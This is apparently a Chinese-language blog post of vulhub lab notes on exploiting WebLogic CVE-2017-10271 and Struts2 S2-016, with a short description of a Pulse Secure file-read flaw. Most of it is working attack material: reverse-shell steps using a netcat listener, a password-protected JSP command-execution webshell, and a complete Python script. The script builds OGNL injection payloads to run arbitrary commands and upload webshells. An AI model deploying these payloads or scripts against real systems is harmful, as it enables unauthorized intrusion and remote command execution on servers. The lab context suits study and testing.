# Download the latest version of the vulhub
git clone https://github.com/vulhub/vulhub.git
# Entry vulnerability directory
cd /path/to/vuln/
# Compile (optional)
docker-compose build
# Run
docker-compose up -d
weblogic-CVE-2017-10271
原理
操作步骤
1、cd .../vulhub/weblogic/CVE-2017-10271
2、docker-compose up -d
3、cat README.md
方法一
监听图中圈出来的地址(此地址为网关地址-尾号为1)
这里实验使用docker虚拟终端中的ip地址网关,利用命令docker exec -it [docker-name] bash
进入容器镜像执行ifconfig
找到ip172.18.0.2
,把尾数改为1放入数据包中:
先不要点击‘Go’,利用命令nc -l -p 21
监听21端口
然后点击Go,终端就会反弹一个shell,如下:
方法二
README里面提供了一个写入jspshell的方法:
这里把圈起来的内容改为jsp一句话后门:
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
#有带回显密码的
在burpsuite上直接发包:
然后直接在网页上访问http://localhost:7001/bea_wls_internal/test1.jsp?pwd=023&i=ls
struts2/s2-016
不解释脚本,两种方法,一种直接写入jspshell,一种写入一个界面(此界面提供一个写jsp木马的平台)
#-*- coding:utf8 -*-
import getopt,sys,requests,re
#有回显带密码验证的Jsp木马后门
JspShell1="""
<%
if("023".equals(request.getParameter("pwd"))){
java.io.InputStream in = Runtime.getRuntime().exec(request.getParameter("i")).getInputStream();
int a = -1;
byte[] b = new byte[2048];
out.print("<pre>");
while((a=in.read(b))!=-1){
out.println(new String(b));
}
out.print("</pre>");
}
%>
"""
url = "http://127.0.0.1:8080/index.action"
path_payload = 'redirect%3A%24%7B%23req%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletRequest%27%29%2C%23a%3D%23req.getSession%28%29%2C%23b%3D%23a.getServletContext%28%29%2C%23c%3D%23b.getRealPath%28"%2F"%29%2C%23matt%3D%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29%2C%23matt.getWriter%28%29.println%28%23c%29%2C%23matt.getWriter%28%29.flush%28%29%2C%23matt.getWriter%28%29.close%28%29%7D'
#写文件的jsp页面
JspShell = """
<%@ page language="java" %><jsp:directive.page import="java.io.File"/><jsp:directive.page import="java.io.OutputStream"/><jsp:directive.page import="java.io.FileOutputStream"/>
<html>
<%
int i=0;
String method=request.getParameter("act");
if(method!=null&&method.equals("up")){
String url=request.getParameter("url");
String text=request.getParameter("text");
File f=new File(url);
if(f.exists()){
f.delete();
}
try{
OutputStream o=new FileOutputStream(f);
o.write(text.getBytes());
o.close();
}catch(Exception e){
i++;
%>
Failed!!
<%
}
}
if(i==0){
%>
Success~!!
<%
}
%>
<body>
<form action='?act=up' method='post'>
<input size="100" value="<%=application.getRealPath("/") %>" name="url"><br>
<textarea rows="20" cols="80" name="text"></textarea><br>
<input type="submit" value="up" name="text"/>
</form>
</body>
</html>
"""
def info():
print('-p webpath')
print('-d Command')
print('-w write jspshell')
def CommandExec(url,Command):
InputCommand = ""
for x in Command.split(' '):
InputCommand += '\'%s\',' % x #将Command中空格转换成逗号
Payload = 'redirect:${%23a%3d%28new%20java.lang.ProcessBuilder%28new%20java.lang.String[]{'
Payload += InputCommand.rstrip(',') #删除字符串末尾的,
Payload +='}%29%29.start%28%29,%23b%3d%23a.getInputStream%28%29,%23c%3dnew%20java.io.InputStreamReader%28%23b%29,%23d%3dnew%20java.io.BufferedReader%28%23c%29,%23e%3dnew%20char[50000],%23d.read%28%23e%29,%23matt%3d%23context.get%28%27com.opensymphony.xwork2.dispatcher.HttpServletResponse%27%29,%23matt.getWriter%28%29.println%28%23e%29,%23matt.getWriter%28%29.flush%28%29,%23matt.getWriter%28%29.close%28%29}'
Result = Requests(url,Payload)
if Result.find('<html') == -1: #命令成功
print('执行命令成功:\n'+Result)
else:
print('Fail...')
def Getwebpath():
webpath = Requests(url, path_payload)
webpath = "".join(webpath.split())
webpath = webpath[:-1]
return(webpath)
def Write_JspShell(url,SavePath):
WebShellPath = "'"+Getwebpath()+"/test.jsp'"
#print (WebShellPath)
Payload = "?redirect:${%23path%3d"
Payload += WebShellPath
Payload += ",%23file%3dnew+java.io.File(%23path),%23file.createNewFile(),%23buf%3dnew+char[50000],%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletRequest').getReader().read(%23buf),%23out%3dnew+java.io.BufferedWriter(new+java.io.FileWriter(%23file)),%23str%3dnew+java.lang.String(%23buf),%23out.write(%23str.trim()),%23out.close(),%23stm%3d%23context.get('com.opensymphony.xwork2.dispatcher.HttpServletResponse'),%23stm.getWriter().println("
Payload += '"'+Getwebpath()+'/test.jsp Get Shell!!!"' #返回值
Payload += '),%23stm.getWriter().flush(),%23stm.getWriter().close()}'
url += Payload
#print(url)
try:
r = requests.post(url, data=JspShell , timeout = 10)#上传jspshell
if r.text.find('<html') == -1:#写入成功
return r.text
else:#写入失敗
return 'Fail.....>_<'
except Exception as e:
return str(e)
def Requests(url, Data):
try:
#print(url+'?'+Data)
response = requests.get(url+'?'+Data)
#response = urllib2.urlopen(url, Data,timeout=10)
except Exception as e:
return str(e)
#过滤异常字符
Result = response.text
return Result
#Result = re.compile('[\\x00-\\x08\\x0b-\\x0c\\x0e-\\x1f]').sub('', response.read())
if __name__ == '__main__' :
try:
opts, args = getopt.getopt(sys.argv[1:],"d:wp")
except:
info()
sys.exit(2)
for opt, value in opts:
if opt == '-d':
CommandExec(url,value)
elif opt == '-w':
print(Write_JspShell(url,value))
elif opt == '-p':
print('webpath:'+Getwebpath())
CVE-2019-11510
漏洞介绍
Pulse Secure Pulse Connect Secure 授权问题漏洞
Pulse Secure Pulse Connect Secure(又名PCS,前称Juniper Junos Pulse)是美国Pulse Secure公司的一套SSL VPN解决方案。
Pulse Secure PCS 9.0RX版本、8.3RX版本和8.2RX版本中存在授权问题漏洞。该漏洞源于网络系统或产品中缺少身份验证措施或身份验证强度不足。
危害影响
成功利用上述漏洞会造成读取任意文件
修复建议
目前厂商已发布升级补丁以修复漏洞,补丁获取链接:
**粗体** _斜体_ [链接](http://example.com) `代码` - 列表 > 引用
。你还可以使用@
来通知其他用户。